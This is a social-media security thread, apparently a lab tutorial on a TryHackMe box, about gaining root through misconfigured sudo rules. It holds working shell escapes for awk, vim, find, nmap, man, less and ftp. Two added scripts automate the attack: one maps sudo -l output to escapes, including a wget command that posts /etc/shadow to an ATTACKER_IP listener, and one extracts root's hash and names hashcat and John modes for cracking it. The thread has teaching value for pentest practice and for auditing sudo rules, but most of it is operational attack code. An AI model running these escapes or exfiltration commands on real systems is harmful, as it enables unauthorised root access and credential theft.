Abusing SUDO rights and popping r00t shells

A thread🧵
#infosec #CyberSecurity #bugbountytips
In this thread🧵 I will walk through how to pop a root shell by abusing a sudo rights misconfiguration, demonstrated on this box:…
First things first, let's start with the theory!😄
What is sudo👑?
sudo ("superuser do") is a Unix/Linux utility that lets a permitted user run commands as another user, normally `root` (the most powerful account). Which users may run which commands, and as whom, is defined by the rules in `/etc/sudoers` (and `/etc/sudoers.d/`).
The `sudo -l` command
`sudo -l` lists the commands the current user is allowed to run through `sudo`, and as which user. Entries tagged `NOPASSWD:` run without any password prompt; all other entries prompt for the user's *own* password (sudo never asks for root's password). For a long-format listing use `sudo -ll`.
- In the snippet above, user `traw` may run ALL commands as root after typing only traw's own password. Unless traw is meant to be an administrator, that is a security issue: the user can escalate to root with a single command such as `sudo su` (or `sudo -i`, which gives a root login shell).
Alright, let's look at another example, this time using the @RealTryHackMe box linked above.
From the snippet above you can see that the user `user` may run quite a number of programs with root privileges. We can abuse those binaries to escalate to root: GTFOBins is a curated website that documents how Unix binaries can be used to bypass restrictions and escalate privileges. Search it for each program name.
If the program is listed with `sudo` as a function, you can use it to elevate privileges, usually via a shell escape (a way to make the root-owned process spawn a shell). Let's take the binaries one by one and try to gain a root shell, following the GTFOBins instructions.
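Before going through them one by one, here is an added helper (example code, not from the thread or from GTFOBins) that reads `sudo -l` output and prints the GTFOBins sudo escape for each of the binaries this thread covers, or `sudo -i` when the rule is simply ALL. The `sudo -l` sample inside it is constructed, and `ATTACKER_IP:PORT` is a placeholder for your own listener.

```shell
#!/bin/sh
# Added example (not code from the original thread or from GTFOBins): read
# `sudo -l` output and print the sudo escape for every binary the thread covers.
# Usage on a target:   sudo -l 2>/dev/null | sh sudo_triage.sh
# ATTACKER_IP:PORT is a placeholder for your own listener.

# Map a binary name to its escape. Each line is the published GTFOBins "sudo"
# technique for that binary; nothing here is specific to the box in the thread.
escape_for() {
    case "$1" in
        awk|gawk|mawk|nawk) printf '%s\n' "sudo $1 'BEGIN {system(\"/bin/sh\")}'" ;;
        vim|vi)  printf '%s\n' "sudo $1 -c ':!/bin/sh'" ;;
        find)    printf '%s\n' 'sudo find . -exec /bin/sh \; -quit' ;;
        nmap)    printf '%s\n' 'TF=$(mktemp); echo '"'"'os.execute("/bin/sh")'"'"' > $TF; sudo nmap --script=$TF   (older nmap: sudo nmap --interactive, then !sh)' ;;
        man)     printf '%s\n' 'sudo man man   then type: !/bin/sh' ;;
        more)    printf '%s\n' 'TERM= sudo more /etc/profile   then type: !/bin/sh' ;;
        less)    printf '%s\n' 'sudo less /etc/profile   then type: !/bin/sh' ;;
        ftp)     printf '%s\n' 'sudo ftp   then type: !/bin/sh' ;;
        apache2) printf '%s\n' 'sudo apache2 -f /etc/shadow   (no shell: leaks line 1 of the file inside a syntax error)' ;;
        wget)    printf '%s\n' 'sudo wget --post-file=/etc/shadow http://ATTACKER_IP:PORT/   (no shell: uploads the file to nc -lvnp PORT)' ;;
        *)       return 1 ;;
    esac
}

# Read `sudo -l` output on stdin and print "binary<TAB>escape" for each hit.
# Rule lines look like "(root) NOPASSWD: /usr/bin/find" or
# "(ALL : ALL) /usr/bin/vim, /usr/bin/awk". Header lines contain no ')' and
# are skipped. A rule whose command list is ALL needs no escape at all.
sudo_triage() {
    while IFS= read -r line; do
        case "$line" in
            *") ALL"*|*"PASSWD: ALL"*)
                printf 'ALL\tsudo -i   (unrestricted: run anything as root)\n'
                continue ;;
            *\)*) ;;
            *) continue ;;
        esac
        # drop "(runas)" and the tag words, then split the comma-separated commands
        printf '%s\n' "$line" \
          | sed -e 's/^[^)]*) *//' -e 's/NOPASSWD://g' -e 's/PASSWD://g' \
                -e 's/NOSETENV://g' -e 's/SETENV://g' -e 's/NOEXEC://g' -e 's/EXEC://g' \
          | tr ',' '\n' \
          | while read -r cmd; do
                bin=${cmd%% *}          # first word is the program; the rest are fixed args
                bin=${bin##*/}
                if esc=$(escape_for "$bin"); then
                    printf '%s\t%s\n' "$bin" "$esc"
                fi
            done
    done
}

# Constructed sample of `sudo -l` output (not from the box in the thread).
SAMPLE_SUDO_L='Matching Defaults entries for user on box:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User user may run the following commands on box:
    (root) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim, /usr/bin/awk
    (ALL : ALL) NOPASSWD: /usr/bin/wget, /usr/sbin/apache2
    (root) NOPASSWD: /usr/bin/man man'

demo() { printf '%s\n' "$SAMPLE_SUDO_L" | sudo_triage; }
demo
```

Pipe real output into it with `sudo -l 2>/dev/null | sh sudo_triage.sh`. sudoers rules can pin arguments (`/usr/bin/man man` in the sample); the script keys only on the program name, so check that the fixed arguments still permit the escape before relying on it. Read in reverse, the same mapping is the administrator's checklist: none of these binaries belongs in a sudo rule for a user who is not meant to be root.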
1. Using awk
2. Using vim
3. Using find
4. Using nmap
5. Using man
6. Using more/less
7. Using ftp
8. Abusing intended functionality

Let's say we run `sudo -l` and find that we can run `apache2` or `wget` with root privileges. Neither binary offers a shell escape, and apache2 gives no way to edit system files either (wget run as root can write arbitrary files with `-O`, so it is not harmless; this thread only uses its read path). Still, we can abuse their intended functionality as root to read `important` system files.

8a. Abusing apache2
From the snippet above you can see that we can read the beginning of the `/etc/shadow` file: `apache2 -f` parses the given file as its configuration and, on failing, prints the offending line inside its syntax error. Only the first unparsable line is shown, and in `/etc/shadow` that is root's entry.
Sadly, no shell. But we have managed to extract root's hash, which means we can try to crack it offline with tools like hashcat or John the Ripper, or with online cracking services.
8b. Abusing wget
With `wget` run as root we can dump important system files such as `/etc/shadow`, `/etc/passwd`, or root's SSH keys by POSTing them to our own machine (`--post-file`). To do this, first set up a netcat listener on the attacker machine to receive the upload:
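As an added example covering both 8a and 8b (not code from the thread), this script pulls root's entry out of the apache2 syntax error, identifies the hash scheme so you know which hashcat mode or john format applies, and strips the HTTP headers from a wget `--post-file` upload captured with netcat. The Apache error text, the captured POST and every hash value in it are constructed samples.

```shell
#!/bin/sh
# Added example (not code from the original thread): turn what the apache2 and
# wget tricks give you into something a cracker can use. The Apache error text,
# the captured HTTP POST and every hash value below are constructed samples.

# `sudo apache2 -f /etc/shadow` parses the file as a config and stops at the
# first line it cannot parse, quoting that line in the error. /etc/shadow
# starts with root's entry, so the leak is exactly root's hash and nothing else.
APACHE_LEAK='AH00526: Syntax error on line 1 of /etc/shadow:
Invalid command '"'"'root:$6$saltsalt$MadeUpHashForIllustrationOnly0123456789abcdefghijklmnopqrstuvwxyzABCDEFG:19000:0:99999:7:::'"'"', perhaps misspelled or defined by a module not included in the server configuration'

# Pull the quoted shadow entry out of the Apache error text (stdin).
shadow_entry_from_apache() {
    q="'"
    text=$(cat)
    entry=${text#*"Invalid command $q"}     # drop everything up to the opening quote
    entry=${entry%%"$q"*}                   # keep everything before the closing quote
    printf '%s\n' "$entry"
}

# Field 2 of a shadow entry is the password hash.
hash_field() { printf '%s\n' "$1" | cut -d: -f2; }

# Identify the crypt(3) scheme from its prefix and print the cracker settings.
classify_hash() {
    case "$1" in
        '')                       printf '%s\n' 'empty: no password hash to crack' ;;
        '!'*|'*'*)                printf '%s\n' 'locked: no crackable hash' ;;
        '$1$'*)                   printf '%s\n' 'md5crypt: hashcat -m 500 / john --format=md5crypt' ;;
        '$5$'*)                   printf '%s\n' 'sha256crypt: hashcat -m 7400 / john --format=sha256crypt' ;;
        '$6$'*)                   printf '%s\n' 'sha512crypt: hashcat -m 1800 / john --format=sha512crypt' ;;
        '$2a$'*|'$2b$'*|'$2y$'*)  printf '%s\n' 'bcrypt: hashcat -m 3200 / john --format=bcrypt' ;;
        '$y$'*)                   printf '%s\n' 'yescrypt: john --format=crypt (no hashcat mode)' ;;
        *)                        printf '%s\n' 'unknown scheme' ;;
    esac
}

# A file sent with `sudo wget --post-file=/etc/shadow http://ATTACKER_IP:PORT/`
# lands in the listener (`nc -lvnp PORT > dump.txt`) with the HTTP request
# headers in front of it; the file body starts after the first blank line.
strip_http_headers() {
    cr=$(printf '\r')
    in_body=0
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%"$cr"}                  # tolerate CRLF line endings
        if [ "$in_body" = 1 ]; then
            printf '%s\n' "$line"
        elif [ -z "$line" ]; then
            in_body=1
        fi
    done
}

# Constructed capture of such a POST (header lines modelled on wget's; body made up).
WGET_CAPTURE=$(printf 'POST / HTTP/1.1\r\nUser-Agent: Wget/1.21.2\r\nAccept: */*\r\nHost: 10.10.14.5:4444\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 75\r\n\r\nroot:$6$saltsalt$MadeUpHash:19000:0:99999:7:::\ndaemon:*:19000:0:99999:7:::')

demo() {
    entry=$(printf '%s\n' "$APACHE_LEAK" | shadow_entry_from_apache)
    hash=$(hash_field "$entry")
    printf 'leaked entry : %s\n' "$entry"
    printf 'hash scheme  : %s\n' "$(classify_hash "$hash")"
    printf 'wget dump body:\n'
    printf '%s\n' "$WGET_CAPTURE" | strip_http_headers
}
demo
```

For john, pair the dump with the matching `/etc/passwd` first (`unshadow passwd shadow > hashes.txt`) and then run `john --wordlist=... hashes.txt`; hashcat takes the bare hash with the mode printed above. The apache2 route only ever reveals the first line of the file, so for any hash other than root's use the wget upload instead.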
That's it! Thank you for reading today's thread😇. If you have other privilege escalation vectors I have missed, feel free to add them in the comments. Would love to know them as well. And be sure to rt🔄 , like💌 and follow👨‍👨‍👧‍👧 me (@xtremepentest) for more future Linux content.

Thread by Traw - Xtreme Pentesting (@xtremepentest).